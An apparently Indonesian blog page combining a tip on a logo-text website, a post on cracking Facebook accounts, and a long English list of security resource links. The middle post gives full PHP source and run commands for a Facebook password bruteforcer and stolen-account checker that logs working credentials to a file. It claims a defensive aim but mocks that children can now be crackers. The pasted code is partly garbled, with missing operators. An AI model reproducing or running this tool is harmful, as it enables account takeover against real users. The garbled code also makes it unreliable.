Cara Membuat Tulisan-Tulisan Keren (Logo)


Hallo selamat sore semua... Di kesempatan kali ini saya mau nge-share artikel tentang Cara Membuat Tulisan-Tulisan Keren (Logo)

Nah ini nih.., yang biasanya anak-anak (muda) cari, yaitu membuat tulisan-tulisan keren/bergaya. Dan biasanya anak-anak itu untuk Wallpaper/Screen Saver di hpnya, dan buat anak-anak bloger yang lagi nyari logo buat blog nya boleh dicoba gan.

Oke kita langsung saja ! Tertarik ingin membuat tulisan-tulisan keren ? Jika kamu hobby/senang membuat tulisan-tulisan keren ! Maka kamu kreasikanlah lewat situs-situs di bawah ini.
http://www.simwebsol.com/imagetool/
Situs di atas adalah situs layanan gratis untuk membuat tulisan-tulisan keren/Logo. :p ! 

Selamat Mencoba, Semoga Bermanfaat!!

Wassalamualaikum Wr. Wb...

cara mudah menuju hacker



Hacking Facebook ? What the Hell Was That ? mungkin kata yang satu itu udah ga asing lagi di telinga para pengguna Facebook, dari anak SD ampe nenek kakek yang make Facebook pasti ga asing dengan kata-kata "facebook saya di hack" atau "waduh facebook saya kena hack, mungkin anda yang sedang membaca tulisan ini juga pernah mengatakan hal serupa, tetapi pada dasarnya tau kah anda bahwa kejadin-kejadin seperti itu bukanlah "KENA HACK" melainkan kena CRACK, karena Hacker dan Cracker itu berbeda, dan taukah anda bahwa kejadian sperti itu bukan karena Si Cracker Jago atau Hebat atau Keren, Melainkan Karena Kelalaian kita (pengguna Facebook). pikir sendiri kenapa ?
Capek Mikir ? ya akun facebook kena hack karena kelalaian kita, seperti memberikan password berupa kata yang mudah di tebak, seperti nama pacar, hari ulang tahun pacar, nama orang terdekat, nama belakang, nama ayah, tanggal lagir dan kata lainya yang mudah untuk di pridiksi dari informasi diri kita, selain itu kebanyakan user (pengguna internet) malas menggunakan Antivirus yang menyediakan Firewall, atau Spyware, sehingga program-program jahat bisa saja mengambil data penting dari komputer yang kita gunakan tanpa kita sadari, Selain itu juga jaman sekarang sudah berubah, bisa masuk ke akun facebook orang lain saja sudah di anggap sebagai seorang hacker, padahal cuman masuk mengguanakn password tidak sengaja di tebak, atau malahan bikin akun trus masuk sendiri (lebay)

Belajar Menjadi Cracker ?

Tulisan saya ini bertujuan untuk memperkenalkan salah satu dari sejuta cara menjadi Cracker, tulisan ini bukan untuk mengajari anda menjadi orang yang jahat, melainkan menunjukan cara bagaiaman seorang Cracker bisa menembus akun facebook kita sehingga nantinya kita bisa terhindar dari kejahilan para cracker dunia maya ini, pada intinya seorang attacker akan mengumpulkan informasi sebanyak-banyak nya dari koraban, nantinya informasi itu akan disusun menjadi sebuah koleksi kata yang mungkin akan menjadi password dari si korban, di lain hal attacker juga sudah mempunyai banyak koleksi akun facebook yang sudah ia dapatkan, dan ingin memeriksa akun tersebut masih bisa digunakan atau tidak
teknik Cracker yang satu ini memang sudah tidak asing lagi, biasa di sebut dengan tebak-tebakan password, atau bruteforcing, pada tulisan-tulisan sebelumnya saya sudah membahas apa itu Password Bruteforcing, secara manual Akun Bruteforcing ini dilakukan dengan memasukan password yang mungkin satu demi satu, sehingga jika ada kemungkinan password sebanyak 150 kata maka kita harus memasukan password sebanyak 150 kali, melelahkan bukan menjadi seorang Cracker (dalam kasus menembus akun facebook), trus gimana caranya ?

Tools

Banyak tools yang bisa kita gunakan untuk melakukan Bruteforcing Facebook akun, jika kita search di google mungkin hasilnya akan banyak, dari yang berbayar dan tidak berbayar, tentu saja kalau mau mendowload tools tersebut harus siap dengan resiko yang tak terduga, seperti trojan, mallware atau worm, saya tidak menyarankan teman-teman untuk mendownload tools-tools tersebut, karena dalam tulisan ini saya sudah menyertakan tools gratis untuk melakukan Facebook Bruteforce, saya membuatnya dengan bahasa PHP (cuman bisa itu) jadi ga perlu khawatir dengan yang namanya virus atau trojan, berikut source codenya
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
<?php
/*
 * Facebook Bruteforce V.1.2
 * Coder : wenkhairu (c) 2012
 *
 * Cleaning up bad coding (I'm a bad coder, what can I say!
 * Do It Your Own Way
 *
 * for My Brother aerul_shinobi
*/
class Facebook{
     
    var $file='file.txt';
    var $file_email 'email.txt';
    var $dict 'dict.txt';
    var $url 'http://www.facebook.com/';
     
 
    function __construct($option){
        switch($option){
            case '-c':
                $this->logo();
                $this->_cek();
            break;
            case'-b':
                $this->logo();
                $this->_brute_forcing();
            break;
            default:
                $this->logo();
                echo "[!] Eg: php facebook.class.php [option]\n";
                echo "[+] option -c (cek) or -b (brute forcing)\n\n";
            break;
        }
         
    }
     
    function logo()
    {
    print_r('
    .___          .__.__                _______       .___    
  __| _/_______  _|__|  | ________ ____ \   _  \    __| _/____
 / __ |/ __ \  \/ /  |  | \___   // ___\/  /_\  \  / __ |/ __ \
/ /_/ \  ___/\   /|  |  |__/    /\  \___\  \_/   \/ /_/ \  ___/
\____ |\___  >\_/ |__|____/_____ \\___  >\_____  /\____ |\___  >
     \/    \/                   \/    \/       \/      \/    \/
        Facebook Bruteforcer And Account Checker Attack v.1.2
        coder : wenkhairu (c) 2012 devilzc0de
        for my Brother : airuel_shinobi (at) subussalam
    ');
          
        print "\n\n";
    }
 
    function _cek_filesize($f){
        if($s filesize($f)){
            if($s <= 1024) return $s." byte";
            else{
                if($s <= 1024*1024) {
                    $s round($s / 1024,2);;
                    return $s." kb";
                }
                else {
                    $s round($s / 1024 / 1024,2);
                    return $s." mb";
                }
            }
        }
        else return "???";
    }
     
 
    function _do_login($email$pass){
        $login $this->login_checker("https://login.facebook.com/login.php?login_attempt=1",true,null,"email=".$email."&pass=".$pass."");
        preg_match('%Set-Cookie: ([^;]+);%',$login,$hasil);
        $cek $this->login_checker("https://login.facebook.com/login.php?login_attempt=1",true,$hasil[1],"email=".$email."&pass=".$pass."");
        preg_match_all('%Set-Cookie: ([^;]+);%',$cek,$akhir);
        for($i=0;$i<count($akhir[0]);$i++){$cookie.=$akhir[1][$i].";";}
        $is_login $this->login_checker($this->url,null,$cookie,null);
        if(preg_match_all("(<a.*?href=[\"']([^\"']+)[\"'][^>]?>(.*?)</a>)i",$is_login,$loged)){
            if(count($loged[0]) > 1){
                    echo "[+] Login Success\n";
                    echo "[+] Login With Email: ".$email." And Password: "$pass."\n";
                    $this->good_acc("[+] Login With Email: ".$email." And Password: "$pass."\n");
            }else{
                echo "[!] Login Failed\n";
            }
        }else{
            echo "[!] Login Failed\n";
        }
    }
     
 
    function _cek(){
        $plain fopen($this->file,'r');
        echo "[+] Dictionary Size :" .$this->_cek_filesize($this->file)."\n";
        echo "[+] Please Wait ....\n";
        sleep(1);
        echo "[+] Starting At"date('d m Y H:i:s')."\n";
        while(!feof($plain))
        {
            $cek explode(":",trim(fgets($plain)));
            $username $cek[0];$password=$cek[1];
            $this->_do_login($username$password);
            echo "[!] Resting... (5)s For Stable Connections\n";
            sleep(10);         
        }
        fclose($plain);
    }
     
    function _brute_forcing(){
        $email_file fopen($this->file_email,'r');
        echo "[+] Dictionary Email Size :" .$this->_cek_filesize($this->file_email)."\n";
        $pass_file fopen($this->dict,'r');
        echo "[+] Dictionary Password Size :" .$this->_cek_filesize($this->dict)."\n";
        echo "[+] Please Wait ....\n";
        sleep(1);
        echo "[+] Starting At"date('d m Y H:i:s')."\n";
        while(!feof($email_file))
        {
            $username = trim(fgets($email_file));
            while(!feof($pass_file))
            {
                $password = trim(fgets($pass_file));
                $this->_do_login($username$password);
                echo "[!] Resting... (5)s For Stable Connections\n";
                sleep(10);         
            }
            fclose($plain);    
        }
        fclose($plain);
    }
     
 
    function login_checker($url$header=NULL, $cookie=NULL,$post=NULL){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_HEADER, $header);
        curl_setopt($ch, CURLOPT_NOBODY, $header);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch, CURLOPT_COOKIE, $cookie);
        curl_setopt($ch, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1) ");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);        
        if ($post) {
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        }
         
        $result = curl_exec($ch);
          
        if($result){
            return $result;
        }else{
            return curl_error($ch);
        }
        curl_close($ch);
    }  
     
    function good_acc($log){
        $file_name="good_account.txt";
        $fp fopen ($file_name"a+");
        fwrite ($fp,$log);
        fclose ($fp);
    }
}
 
$tes new Facebook($argv[1]);
 
?>


Tools tersebut akan melakukan bruteforcing dan melakukan pemeriksaan akun facebook yang sudah di ambil alih, jika akun yang di cek maupun akun yang di brute masih aktif dan berhasil login maka hasilnya akan di simpan dalam file baru dengan nama good_account.txt, cara menggunakannya cukup simple, jika pengguna windows hanya menjalankan melalui command prompt dan pastikan extensi curl pada php sudah di aktifkan, sedangkan untuk pengguna linux cukup jalankan terminal dan jangan lupa install curl tentunya, berikut cara menjalankannya


1
2
3
4
5
6
7
8
9
#file bat untuk windows
#untuk melakukan check akun facebook yang ada gunakan option -c
#sedangkan untuk melakukan bruteforcing gunakan option -b
cls
C:\xampplite\php\php.exe facbook.php [option]
pause

#untuk linux
php facbook.php [option]





Nah cukup mudah kan menjadi seorang Cracker ? hanya dengan sedikit kemampuan anak-anak juga bisa menjadi Cracker, hanya memanfaatkan tools-tools yang bertebaran di internet siapa saja bisa menjadi siapa saja, penulis tidak bertanggung jawab atas apa yang terjadi akibat tools buatan penulis, kalo mau nyoba ya tanggung resiko sendiri ya,

Pencegahan

Cukup simple untuk mencegah akun kita di retas, bahkan dengan tools bruteforcing yang berbayar sekali pun, gunakan lah password yang tidak umum, seperti gabungan huruf dan angka, jangan gunakan password dengan nama pacara atau kata yang berasal dari informasi diri anda, gunakan password yang berbeda untuk setiap akun anda, gunakan antivirus yang bagus, dan terakhir Thanks For reading, Download Script Full

situs keamanan website



Sharing mengenai kumpulan link url situs keamanan, link url situs keamanan internet, link url situs keamanan teknologi informaso, link url keamanan elektronik, link url situs keamanan website, link keamanan jaringan, link ebook keamanan internet, url keamanan komputer, link url situs keamanan laptop, link url situs keamanan handphone, computer security, situs security, security jaringan, security alarm system, cctv security system, remove security tool, security task manager, microsoft security,security essential, security website, social security website, website’s security certificate, security web, site security, html security, dll. Semoga bermanfaat


CONTENTS
- Security Guides/Handbooks/Tutorials - Firewalls
- General Security Tips and Advice - Wireless Security
- Best Security Software - Website/Application Security
- Identity Theft/Fraud - Network Security
- Anti-phishing - Data Backup
- Anti-spam - Publications
- Malicious Software Information - Miscellaneous
- Latest Security News - Friends of Select Real Security
- Social Networking Security - Revision History
- Password Security



Security Guides/Handbooks/Tutorials

Malicious Software Prevention:
Gizmo’s Guide to Securing Your PC by Gizmo Richards
How to Stay Safe While Online
How-to Security Booklet by Security In a Box
Malware Prevention – Preventing Re-infection by Russ Stamm
How Malware Spreads – How Did I Get Infected by Russ Stamm
Hardening Windows Security
How (and why) to secure your Windows PC
Malware Incident Prevention and Handling [PDF]
CKnow Computer Virus Tutorial
Securing Windows XP by Eric Vaughan and Allen Weil
Securing Your Home Computer
Protect Your Computer by Oregon State University
The 20 Minute Guide to PC Security
Computer Virus Primer for Network Administrators by Bernie Klinder
Keeping Your Kids Internet Safe and Smart [PDF]
Browser Security Handbook by Michal Zalewski
IT Security Cookbook by Sean Boran
Cyber-Safety for Everyone: from Kids to Elders by M. E. Kabay [PDF]
Keep Yourself and Your Stuff Safe Online by Linda McCarthy
How to Secure Windows and Your Privacy by Howard Fosdick [PDF]
Silver Surfers’ Online Safety Guide [PDF]
HackerProof: Your Guide To PC Security by Matt Smith
Microsoft Security Update Guide
Best Practices for Keeping Your Home Network Secure by NSA [PDF]
Security Concepts: an online book about computer, hardware, and cryptographic security.
The Rough Guide to Online Safety by GetSafeOnline.org
Computer and Data Security Guide for Windows



Malicious Software Removal:
Malware Removal Guide for Windows
How to Clean An Infected Computer
How to clean up your site from a malware infection
General Security Tips and Advice
Cyber Security Tips: tips and advice on common security issues for non-technical computer users.
Security Awareness Tip of The Day: has a huge collection of simple and useful tips and provides a new tip every day.
Home Computer Security Checklist: a list of computer security tips with comprehensive details about each tip.
Security 101: a large collection of tips, how-to’s and other advice on computer and network security.
CyberCoyote: has excellent information and advice that covers a variety of security topics.
The Top Ten Most Dangerous Things You Can Do Online
Stopping Malware on its Tracks: lists ways you can prevent and detect infections (by Lenny Zeltser).
Securing Microsoft Windows by David A. Wheeler
How to Stay Secure Online by Adam Dachis
How to protect yourself from malware
32 Ways to Secure Your Digital Life
Safe Internet Surfing by Robert P. Lipschutz and John Clyman
Malware Prevention and Avoidance
9 Easy Ways To Never Get A Virus by James Bruce
Ten Immutable Laws Of Security: Microsoft’s ten facts of life regarding computer security.
6 Rules of Thumb to Help Protect Your Information and Privacy Online by Tracy Hulver
Protecting a Laptop from Simple and Sophisticated Attacks by Mike Cardwell
Best Security Software
Best Free Security Software for Windows: tells you the latest and best free security software that you could be using.
Best Antivirus Comparison: compare antivirus reviews and ratings.
Identity Theft/Fraud
About Identity Theft – Deter. Detect. Defend
Identity Theft: What to Do if It Happens to You: provides instructions how to reclaim your financial health and who to contact for more help.
Identity Theft FAQ: answers to frequently asked questions about identity theft.
Reducing the Risk of Fraud: lists steps you can take to reduce your risk of fraud.
Limiting Identity Theft Damage
Identity Theft Prevention Handbook by Todd M Feinman
Email and web scams: How to help protect yourself: learn how to avoid online scams that may come your way.
How To Prevent Identity Theft – 11 Easy Ways
9 Ways to Prevent Identity Theft From Your Online Activities
Preventing and Responding to Identity Theft
25 Ways to Avoid Auction Fraud From a Seller’s Perspective
How to Protect Yourself from Online Fraud and Identity Theft by Alan Henry
Anti Phishing
PhishTank: submit, verify, track, and share phishing data.
Google Safe Browsing: report phishing pages.
How to Avoid Phishing Scams: lists helpful advice you can use to avoid becoming a victim of phishing scams.
The Phishing Guide: covers the technologies and security flaws Phishers exploit to conduct their attacks, and provides detailed advice on what organizations can do to prevent future attacks (by Gunter Ollmann).
How to recognize phishing e-mails or links
Anti Spam
How to reduce the quantity of spam
How to Avoid Getting Spammed
How to Report Spam
Twitter Account Validator: quickly check if a twitter username is a spammer or a bot.
Free Anti-Spam Tools and Services
Email Harvesting Techniques FAQ: lists and describes the many ways spammers get email addresses.
Malicious Software Information
The Evolution of Malicious Agents by Lenny Zeltser
Strategies of Computer Worms: describes the nature and evolution of the computer worm (by Peter Szor).
Most Damaging Malware: provides an overview of the most damaging types of malware (by Mary Landesman).
Rootkit Analysis: What is a Rootkit by Matthew Vea
A quick and dirty guide to malware: a three-part series covering viruses, trojans, and worms.
Malware Characteristics
How to Identify Malware Behavior by Mark Morgan
The Truth about Trojan Horses on the Internet by Sarah Gordon and David M. Chess
Inside the Business of Malware (Infographic): shows the way that attackers compromise their victims’ computers, sell malware and then launder the proceeds.
Malware Infection Vectors: Past, Present, and Future by Paul Schmehl
Who creates malware and why?
Latest Security News
The Register
Threatpost
Help Net Security
CNET News
Social Networking Security
Staying Safe on Social Network Sites
How to protect your Facebook account from hackers, spammers and clowns
6 Tips for Safer Facebooking
How to Tweet Safely: A Quick Guide to Twitter Security
11 Security Tips for Online Social Networking by Lenny Zeltser
How to Avoid Malware on Facebook and Twitter by Sarah Perez
The 8 Most Important Ways to Protect Your Identity and Privacy on Facebook
A Guide to Facebook Security by Facebook
Password Security
Password Strength Checker: online tool that tests the strength of your passwords as you type them.
How I’d Hack Your Weak Passwords: John Pozadzides provides an excellent read about password security.
A Guide To Better Password Practices by Sarah Granger
Creating Secure Passwords: tips for creating strong passwords you can remember (by Tony Bradley).
Passwords: Make them Effective
The Usability of Passwords: an excellent article on “how to make usable and secure passwords” (by Thomas Baekdal).
Secure Web Browsing
Best Free Browser Protection Utility
Securing Your Web Browser: provides instructions on how to configure your web browser for safer internet surfing.
URLVoid: quickly check if a website is safe to browse.
vURL Online: quickly and safely analyze malicious or suspected websites.
Firewalls
Firewalls by Tony Northrup: covers the design, deployment, and use of both network and host-based firewalls.
How to Select a Network Firewall by Brian Monkman
Interhack’s Internet Firewall FAQ: answers to frequently asked questions about Internet firewalls.
Firewall FAQ by Microsoft
Email Security
Mail Security – Keep Your Inbox Safe: comprehensive tutorial with tips and tricks for email security.
The 25 Most Common Mistakes in Email Security
Best Free Email Client
Five Free Temporary Email Services To Avoid Spam
Wireless Security (Wi-Fi)
How to Secure Your Wireless Network by Becky Waring
10 Tips for Wireless Home Network Security
Keep Your Windows Computer Secure on Public Wireless Hotspots
8 tips for working securely from wireless hot spots
5 ways to protect your Wi-Fi network from hackers by Phil Hornshaw
How to Lock Down Your Wireless Network by Alex Wawro
Website and Application Security
SQL Injection Attack and Defense by Sagar Joshi
SQL Injection Attacks and Some Tips on How to Prevent Them by Colin Mackay
How to prevent your site from getting hacked / How to repair a damaged site by Steven Whitney.
Web Application Penetration Testing: information for penetration testers.
10 Ways To Beef Up Your Website’s Security
Basic Website Security Checklist by Chad Perrin
Common Security Mistakes in Web Applications by Philip Tellis
Unmask Parasites: free online tool that scans your website for malware.
CWE/SANS Top 25 Most Dangerous Software Errors: a list of the most widespread and critical programming errors.
WordPress Security 101: Securing Your Site by Willie Jackson
Securing Your WordPress Website by Daniel Pataki
SQL Injection Prevention Cheat Sheet
Network Security
Introduction to Network Security by Matt Curtin
Home Network Security: an overview of the security risks and countermeasures associated with Internet connectivity.
Top 125 Network Security Tools: listing of the top 125 network security tools.
Network Security in the Age of *Any* Computing by Mike Rothman
Data Backup
How to back up files and recover data
Best Free Backup Program
Best Free Online Backup Sites
The Backup and Restore Guide by Tina Sieber
How To Backup Operating Systems: a step-by-step guide for backing up and restoring the operating system installed on your PC.
Security Publications
SANS Information Security Reading Room: has over 1,900 original computer security white papers in 77 different categories.
Network Security Library: site with hundreds of network security related articles, books, FAQs, and white papers.
Security Papers and Articles: vulnerability analysis papers, tutorials and articles from the Exploit Database.
The Infosec Writers Text Library
White Papers and Articles – Trend Micro
Honeynet Project – Know Your Enemy Papers
Information Security Research Library: white papers, case studies and product information on the latest security solutions and technologies.
Technical Info – Gunter Ollmann: has some excellent white papers and articles on various security topics.
PacketSource: directory of information security articles, white papers, and documents.
US-CERT – Security Publications
RootSecure – PDF Documents: notable papers and articles from the past few years on security and other related topics.
Symantec Security Response: offers white papers on a range of issues relating to Internet security.
Entrust White Papers on Internet Security and Encryption
SecDocs: provides papers, slides, and videos on IT security and hacking.
ICSA Labs White Papers
ESET White Papers
Infosec White Papers
Miscellaneous
Modern Computer Attack and Defense Techniques by Lenny Zeltser
Web Security: Are You Part Of The Problem? by Christian Heilmann
Security Risks of Near Field Communication: looks at the risks associated with NFC and tells you how to avoid them.
Firewall Guide: information and reviews on security, personal firewall software and hardware, and more.
Firewall.com: a directory of security resources.
Complete Computer Security Information – David Woodsmall: a multitude of links to articles and websites about protecting your computer and data (frequently updated).
GCK’s Information Security URLs: provides links to security related sites.
IT Security Overview and Web Resources
The Six Dumbest Ideas in Computer Security: a very interesting read (by Marcus J. Ranum).
Plug and Prey: Malicious USB Devices: an overview of malicious USB devices (by Adrian Crenshaw).
How To Completely and Securely Erase Your Hard Drive
SANS Intrusion Detection FAQ
Antiviral Software Evaluation FAQ: how to review, evaluate, and decide which antivirus packages to buy (by Robert Slade).
The WWW Security FAQ by Lincoln D. Stein & John N. Stewart
Friends of Select
Bill Mullins Weblog
Protect your Profile and Internet Status: a blog that shows you simple ways to protect your online and offline identity.
Bookmarks4Techs: features over 500 links to useful tech sites (frequently updated).
What’s On My PC: a blog about computers, software, gadgets, and information technology.
Experts Galaxy: all about computer and digital security.
Security [CENTRAL] Forum
Raj Chandel’s Blog


Sumber Artikel: http://www.selectrealsecurity.com/useful-security-resource